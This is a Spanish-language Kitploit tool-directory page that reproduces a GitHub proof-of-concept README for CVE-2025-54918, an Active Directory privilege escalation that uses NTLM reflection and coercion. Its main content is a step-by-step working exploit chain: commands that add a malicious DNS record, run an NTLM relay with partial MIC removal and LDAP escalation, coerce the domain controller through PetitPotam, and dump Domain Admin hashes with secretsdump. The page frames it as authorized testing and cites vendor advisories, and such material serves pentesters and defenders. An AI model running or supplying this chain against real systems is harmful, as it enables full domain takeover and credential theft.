Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
Herramientas/GitHubGitHub/wh0am123/cve-2025-54918-poc
Escalada de PrivilegiosAnálisis de VulnerabilidadesExplotaciónPruebas de PenetraciónAutenticaciónAprendizaje y EducaciónRed TeamingLabs y Práctica
GitHubwh0am123/cve-2025-54918-poc

CVE-2025-54918-POC

POC para CVE-2025-54918 y una demostración técnica.

Ver Repositorio
64723hace 8 mesesRevisado por Kitploit

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

CVE-2025-54918 – Prueba de Concepto (PoC)

⚠️ Aviso Importante

IMPORTANTE:
Para probar CVE-2025-54918, debe crear un registro DNS en el entorno de Active Directory de destino.
Siempre consulte con el cliente y obtenga autorización explícita antes de realizar pruebas, ya que esto puede afectar el comportamiento de DNS y autenticación en entornos de producción.

Este repositorio contiene una Prueba de Concepto técnica que demuestra cómo un usuario de dominio con privilegios bajos puede escalar a acceso de nivel de Administrador de Dominio abusando de reflexión NTLM combinada con coerción de autenticación.

Nota: el CVE es explotable incluso con signing configurado en True, que es el valor predeterminado para un controlador de dominio. Además, la corrección de CVE-2025–54918 fue para windows 2025, y CVE-2025–33073 corrigió (no intencionadamente) para windows 2022.

Un desglose más técnico está disponible en mi página de Medium: https://yousofnahya.medium.com/hands-on-exploitation-of-cve-2025-54918-cf376ebb40e1


Entorno

  • IP del Controlador de Dominio: 192.168.140.150 (Signing está en True, que es el valor predeterminado para un controlador de dominio)
  • IP del Atacante: 192.168.140.135
  • Dominio: nahya.local
  • Usuario: test Usuario de dominio válido (sin privilegios DCSync)

Herramientas

Clone los repositorios necesarios:

root@kitploit:~
git clone https://github.com/dirkjanm/krbrelayx.git
git clone https://github.com/decoder-it/impacket-partial-mic.git

Validación de Línea Base (Fallo Esperado)

Verifique que el usuario no pueda realizar DCSync antes de la explotación:

root@kitploit:~
python3 impacket-partial-mic/examples/secretsdump.py USERNAME:PASSWORD@DC

Usuario Normal


Paso 1: Agregar Registro DNS Malicioso

Cree un registro DNS usando el nombre NetBIOS + 1UWhRCAAAAAAAAAAAAAAAAAAAAAAAAAAAAwbEAYBAAAA que resuelva a la IP del atacante.

root@kitploit:~
python3 dnstool.py -u 'nahya.local\USERNAME' -p 'PASSWORD' \
  dc.nahya.local -a add \
  -r 'localhost1UWhRCAAAAAAAAAAAAAAAAAAAAAAAAAAAAwbEAYBAAAA' \
  -d '192.168.140.135' -dns-ip 192.168.140.150

Agregando DNS


Paso 2: Iniciar Relay NTLM (Terminal 1)

Ejecute ntlmrelayx con eliminación parcial de MIC y escalado LDAP habilitado:

root@kitploit:~
python3 impacket-partial-mic/examples/ntlmrelayx.py --remove-mic-partial -smb2support -t ldaps://DC  --escalate-user USERNAME  --no-validate-privs

iniciar ntlmrelayx


Paso 3: Coaccionar Autenticación del Controlador de Dominio (Terminal 2)

Fuerce al Controlador de Dominio a autenticarse en el registro DNS controlado por el atacante usando una técnica de coerción (PetitPotam):

root@kitploit:~
nxc smb DC -u 'USERNAME' -p 'PASSWORD' -M coerce_plus -o METHOD=PetitPotam LISTENER=localhost1UWhRCAAAAAAAAAAAAAAAAAAAAAAAAAAAAwbEAYBAAAA

coaccionar DC


Paso 4: Verificar Explotación (DCSync)

Vuelva a ejecutar secretsdump para confirmar la escalada de privilegios:

root@kitploit:~
python3 impacket-partial-mic/examples/secretsdump.py USERNAME:PASSWORD@DC

✅ Resultado esperado: DCSync exitoso y obtención de hashes de Administrador de Dominio

DCSync Funcionó


Resultado

En este punto, el atacante ha:

  • Retransmitido autenticación NTLM del Controlador de Dominio (Signing True)
  • Escalado privilegios vía LDAP
  • Logrado DCSync, resultando en compromiso total del dominio

Consulte el artículo de Medium para una explicación detallada de la vulnerabilidad y la cadena de ataque.


🙏 Créditos

Este trabajo no habría sido posible sin:

  • Bryan De Houwer – Autor de CVE-2025-54918 https://www.linkedin.com/in/bryan-de-houwer/
  • Andrea Pierini – Por su excelente investigación y blogs en decoder.cloud https://www.linkedin.com/in/andrea-pierini-aba9a37/
  • Andrea Pierini – Por la implementación de impacket-partial-mic
    https://github.com/decoder-it/impacket-partial-mic

🔗 Referencias

  • Analizando la Vulnerabilidad de Bypass de Autenticación NTLM y LDAP – Blog de CrowdStrike
    https://www.crowdstrike.com/en-us/blog/analyzing-ntlm-ldap-authentication-bypass-vulnerability/

  • Aviso de Seguridad de Microsoft – CVE-2025-54918 – Guía de Actualización de MSRC
    https://msrc.microsoft.com/update-guide/advisory/CVE-2025-54918


Descargo de Responsabilidad

Esta Prueba de Concepto se proporciona solo con fines educativos y de pruebas de seguridad autorizadas.

  • No utilice esta técnica contra sistemas que no posea o para los que no tenga permiso explícito para probar.
  • El autor no asume ninguna responsabilidad por mal uso o daños.
  • Siga siempre las prácticas de divulgación responsable y hacking ético.
Descargar herramienta